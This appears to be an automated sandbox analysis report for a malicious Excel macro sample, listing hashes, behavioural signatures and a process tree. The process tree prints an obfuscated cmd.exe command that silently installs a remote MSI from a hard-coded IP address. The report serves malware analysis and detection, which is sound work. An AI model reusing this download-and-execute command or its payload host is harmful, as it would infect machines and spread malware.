Analysis
-
max time kernel
138s -
max time network
149s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
30-06-2020 17:58
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Heur.Macro.Generic.h.4bdfa2fa.9877.xls
Resource
win7
Behavioral task
behavioral2
Sample
SecuriteInfo.com.Heur.Macro.Generic.h.4bdfa2fa.9877.xls
Resource
win10v200430
General
-
Target
SecuriteInfo.com.Heur.Macro.Generic.h.4bdfa2fa.9877.xls
-
Size
172KB
-
MD5
ac016bd363b76505c4b5f55fa92bf343
-
SHA1
245a98cac3ab0bb615aa265c2774e34c1fcf2bd3
-
SHA256
95bd7a62ced0c80358c8e3fd12bb8acb9aecea2b35fa43e7a343cb38ae233e5f
-
SHA512
812ed62c7379e690f3e9af0cde79d1e38e5ed0971f98f0662584ea885e03bc8b36e31dfc7c54a2be2f5989605ff59e6d53a4e4b7f875fff0f8ac9dc40bdbb7c2
Malware Config
Signatures
-
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 1628 EXCEL.EXE 1628 EXCEL.EXE 1628 EXCEL.EXE 1628 EXCEL.EXE 1628 EXCEL.EXE 1628 EXCEL.EXE 1628 EXCEL.EXE 1628 EXCEL.EXE 1628 EXCEL.EXE 1628 EXCEL.EXE 1628 EXCEL.EXE 1628 EXCEL.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4036 1628 cmd.exe EXCEL.EXE -
Use of msiexec (install) with remote resource 1 IoCs
Processes:
msiexec.exepid process 4064 msiexec.exe -
Blacklisted process makes network request 1 IoCs
Processes:
msiexec.exeflow pid process 15 3544 msiexec.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1628 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
EXCEL.EXEcmd.exedescription pid process target process PID 1628 wrote to memory of 4036 1628 EXCEL.EXE cmd.exe PID 1628 wrote to memory of 4036 1628 EXCEL.EXE cmd.exe PID 4036 wrote to memory of 4064 4036 cmd.exe msiexec.exe PID 4036 wrote to memory of 4064 4036 cmd.exe msiexec.exe -
Suspicious use of AdjustPrivilegeToken 32 IoCs
Processes:
msiexec.exemsiexec.exedescription pid process Token: SeShutdownPrivilege 4064 msiexec.exe Token: SeIncreaseQuotaPrivilege 4064 msiexec.exe Token: SeSecurityPrivilege 3544 msiexec.exe Token: SeCreateTokenPrivilege 4064 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4064 msiexec.exe Token: SeLockMemoryPrivilege 4064 msiexec.exe Token: SeIncreaseQuotaPrivilege 4064 msiexec.exe Token: SeMachineAccountPrivilege 4064 msiexec.exe Token: SeTcbPrivilege 4064 msiexec.exe Token: SeSecurityPrivilege 4064 msiexec.exe Token: SeTakeOwnershipPrivilege 4064 msiexec.exe Token: SeLoadDriverPrivilege 4064 msiexec.exe Token: SeSystemProfilePrivilege 4064 msiexec.exe Token: SeSystemtimePrivilege 4064 msiexec.exe Token: SeProfSingleProcessPrivilege 4064 msiexec.exe Token: SeIncBasePriorityPrivilege 4064 msiexec.exe Token: SeCreatePagefilePrivilege 4064 msiexec.exe Token: SeCreatePermanentPrivilege 4064 msiexec.exe Token: SeBackupPrivilege 4064 msiexec.exe Token: SeRestorePrivilege 4064 msiexec.exe Token: SeShutdownPrivilege 4064 msiexec.exe Token: SeDebugPrivilege 4064 msiexec.exe Token: SeAuditPrivilege 4064 msiexec.exe Token: SeSystemEnvironmentPrivilege 4064 msiexec.exe Token: SeChangeNotifyPrivilege 4064 msiexec.exe Token: SeRemoteShutdownPrivilege 4064 msiexec.exe Token: SeUndockPrivilege 4064 msiexec.exe Token: SeSyncAgentPrivilege 4064 msiexec.exe Token: SeEnableDelegationPrivilege 4064 msiexec.exe Token: SeManageVolumePrivilege 4064 msiexec.exe Token: SeImpersonatePrivilege 4064 msiexec.exe Token: SeCreateGlobalPrivilege 4064 msiexec.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Heur.Macro.Generic.h.4bdfa2fa.9877.xls"1⤵
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ms^iE^x^ec /i http://199.195.250.60/gg/new-order0456.msi /qn2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msiexec.exemsiExec /i http://199.195.250.60/gg/new-order0456.msi /qn3⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blacklisted process makes network request
- Suspicious use of AdjustPrivilegeToken